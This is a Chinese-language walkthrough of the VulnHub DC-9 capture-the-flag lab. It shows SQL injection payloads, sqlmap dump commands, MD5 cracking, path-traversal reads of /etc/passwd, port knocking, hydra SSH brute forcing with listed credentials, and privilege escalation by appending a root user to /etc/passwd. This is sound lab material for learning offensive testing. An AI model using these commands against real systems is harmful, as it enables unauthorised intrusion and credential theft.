DC-9
DC-9下载:https://download.vulnhub.com/dc/DC-9.zip.torrent
攻击者kali:192.168.1.11
受害者DC-9:192.168.1.14
使用arp-scan -l得到DC-9IP地址
用nmap扫描DC-9
nmap -sS -A -p- 192.168.1.14
扫出了22和80端口,但是22端口是filtered
访问一下80
没有从定向,正常访问,提示我们从菜单中选择一个选项,小孩子才做选择,我全都看看有啥。
在Display all Records里有一些用户信息
第三个Search,搜索
提示我们可以使用名字的姓氏进行搜索,前面第二个菜单不是有用户信息嘛,复制第一个用户的性氏搜索一下
得到了用户得信息,尝试一下手工注入看看,确定一下是不是有sql注入漏洞
常用的手工注入命令
1' and 1=1;#? 判断是否可以被注入
1' or 1=1;#?? 尝试获取全部账号信息
1' union all select 1,2;#? 尝试获取参数个数
1' union all select 1,(@@version);#? 获取数据库版本
1' union all select 1,(databases());# ?获取数据库名称
判断一下是否能注入
Mary' and 1=1;#
能注入成功
既然有注入点,直接sqlmap搞起
想直接url注入,没想到失败
换个方式用burp抓包,然后再注入
在kali打开burp
查看burp的代理
浏览器设置好一样的代理
burp开启抓包
浏览器在Search搜索
提交
burp抓到数据包
右键选择copy to file
命名为dc9.txt点击保存
文件里就会有抓包的数据
burp关掉抓包
sqlmap注入 ??-r注入是http头注
sqlmap -r dc9.txt --dbs
得到两个数据库,Staff和users,肯定选users
继续注入
sqlmap -r dc9.txt -D users --tables
sqlmap -r dc9.txt -D users -T UserDetails –dump
得出一些账号密码信息不知道有什么用
我最后真是啪啪打脸,user里面没有管理员得信息
注入另一个表
sqlmap -r dc9.txt -D Staff --tables?
一样注入users
sqlmap -r dc9.txt -D Staff -T Users --dump
获取表里得信息
爆出了管理员和密码
看起来像是md5加密的,拿去md5解密一下
由于网上的MD5解密都是收费的
尝试安装一下啊md5解密工具
在gitee上找到
https://gitee.com/mirrors_s0md3v/Hash-Buster?_from=gitee_search
下载到kali
git clone https://gitee.com/mirrors_s0md3v/Hash-Buster/
进入到Hash-Buster目录,执行脚本
cd Hash-Buster/?
python3 hash.py -s 856f5de590ef37314e7c3bdf6f8a66dc
将md5值放到后面,最后解出密码
密码为 : transorbital1
去尝试登录试试
登录成功,下面这里还提示我们有文件包含漏洞
尝试一下看看有没有
因为使用的是apache服务器,可以判断他的网页路径在/var/www/html
../../../etc/passwd下没有显示,应该是在html下还有一个目录,然后我加了一个../
http://192.168.1.14/welcome.php?file=../../../../etc/passwd
成功显示
看到有几个眼熟的账号
结果对对比一看
这不是之前sql注入users数据库表里的数据嘛UserDetails
之前还不知道干啥用
那么是不是可以尝试一下ssh爆破,毕竟数据表里有账号密码
但是ssh状态为filtered,有可能是被防火墙过滤了
去查看一下配置
http://192.168.1.14/welcome.php?file=../../../../etc/knockd.conf
分别去连续访问这三个端口才行 ?7469 8475? 9842
使用nmap搞一下
再次扫描就发现22端口开了
在桌面创建两个txt文本分别为dc9user.txt和dc9pass.txt
dc9user.txt
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
dc9pass.txt
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
将账号密码放入
接下来使用hydra来爆破
hydra -L dc9user.txt -P dc9pass.txt 192.168.1.14 ssh
爆出了三个账号
login: chandlerb?? password: UrAG0D!
login: joeyt?? password: Passw0rd
login: janitor?? password: Ilovepeepee
三个都试试登录ssh
经过一番折腾
在janitor账号下发现一个密码字典
那么在将这几个密码加入dc9pass.txt下再爆破一次看看,是否能在出账号
最后多爆出另一个账号
login: fredf?? password: B4-Tru3-001
进行ssh登录
登录成功
查看一下权限
提示这个文件
进入这个文件的目录看看
cd /opt/devstuff/dist/test/
尝试执行一下test文件
执行不了,需要test.py
返回到devstuff目录下看到有个test.py的脚本
代码的意思是将第一个文件的内容写入第二个文件中
那就创建一个文件写入我们自己登录的账户信息
先使用openssl工具生成一个hash值
意思是demon 的密码为123456
openssl passwd -1 -salt demon 123456
将hash值复制到
echo 'demon:$1$demon$Mspg7FhbFwGLZ4T2s/qI6/:0:0:root:/bin/bash' >> /tmp/demon
将我们的登录信息写入到tmp目录下的demon
再利用test将/tmp/demon的内容写入到/etc/passwd
sudo ./test /tmp/demon /etc/passwd
切换用户到我们创建的demon用户
su demon
输入密码回车,查看当前权限,是root,提权成功
打开交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
在root目录下找到flag
DC-9总结
sql手工注入判断是否有sql注入漏洞
sqlmap的rul注入失败,使用burp抓包,然后http头注
burp熟练度使用
sqlmap的注入获取到用户信息,还有admin管理账号的hash值
因为是md5加密,下载Hash-Buster解密md5,得到管理员密码
登录后提示有文件包含漏洞,通过对apache的熟练判断网页所在位置利用文件包含漏洞查看文件
查看/etc/passwd获取信息,方便进一步ssh账号爆破
ssh状态为filtered,查看/etc/knockd配置文件
nmap访问三个端口7469、8475、9842,ssh端口open
将数据库注入获取到的账号密码存储为txt文本
使用hydra爆破ssh登录的账号密码
在三个账号下找到密码字典,从新尝试爆破,获取新的ssh登录账号
尝试提权
openssl工具的使用
提权成功
打开交互模式python -c 'import pty;pty.spawn("/bin/bash")'
在root目录下拿到flag
